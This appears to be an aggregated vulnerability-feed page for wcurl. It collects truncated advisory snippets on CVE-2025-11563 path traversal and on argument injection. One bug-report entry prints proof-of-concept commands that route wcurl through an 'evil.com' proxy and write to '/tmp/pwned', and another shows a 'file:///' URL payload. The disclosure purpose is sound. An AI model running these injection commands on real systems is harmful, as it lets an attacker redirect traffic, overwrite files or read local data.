JLSEC-2026-425 URLs containing percent-encoded slashes (`/` or `\`) can trick wcurl into saving the output file...

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

curl: wcurl treats some URL operands after -- as curl options

I found that wcurl does not always keep operands after -- in a pure URL-data context. The documented way to pass curl options through wcurl is --curl-options, but a value supplied as a URL operand can still reach the final curl command as an option, for example wcurl -- "--url=file:///...". A...

ROS-20260310-73-0006

Vulnerability in wcurl related to incorrect path name restriction to a restricted directory. Exploitation of the vulnerability may allow a remote attacker to gain unauthorized access to protected information...

CVE-2025-11563

A flaw was found in wcurl. This vulnerability allows a remote attacker to manipulate the location where output files are saved. By crafting a malicious URL with percent-encoded slashes, the attacker can trick the wcurl command-line tool into writing files outside of the intended directory. This...

CVE-2025-11563

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

CVE-2025-11563

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

UBUNTU-CVE-2025-11563

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

CVE-2025-11563 wcurl path traversal with percent-encoded slashes

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

CVE-2025-11563 wcurl path traversal with percent-encoded slashes

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

CVE-2025-11563

CVE-2025-11563 corresponds to a path traversal vulnerability in wcurl (the curl tool component). The issue arises in wcurl versions prior to 2025-11-04, enabling path traversal when URLs contain a percent-encoded slash. Documented across multiple feeds (OSV, Ubuntu/Debian advisories, and vendor/N...

CVE-2025-11563

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

CVE-2025-11563

URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly asking for it. This flaw only affects the wcurl command line tool...

curl: wcurl Argument Injection via Unquoted Variable

when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

Amazon Linux 2023 : curl, curl-minimal, libcurl (ALAS2023-2025-1317)

It is, therefore, affected by a vulnerability as referenced in the ALAS2023-2025-1317 advisory. wcurl path traversal with percent-encoded slashes URLs containing percent-encoded slashes / or \ can trick wcurl into saving the output file outside of the current directory without the user explicitly...

SUSE-SU-2025:4236-1 Security update for curl

This update for curl fixes the following issues: - CVE-2025-11563: Fixed wcurl path traversal with percent-encoded slashes bsc1253757...

wcurl Installed (macOS)

Binary data macoswcurlinstalled.nbin...

wcurl 2024.12.08 < 2025.11.04 Path Traversal

The version of wcurl installed on the remote host is prior to 2025.11.04. It is, therefore, affected by a path traversal vulnerability when the URL contains a percent-encoded slash. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported versi...

curl 路径遍历漏洞

curl is an open-source tool developed by cURL, used for transferring data from or to a server. Curl has a path traversal vulnerability, which allows attackers to traverse directories using wcurl, resulting in writing files outside of the service’s root path...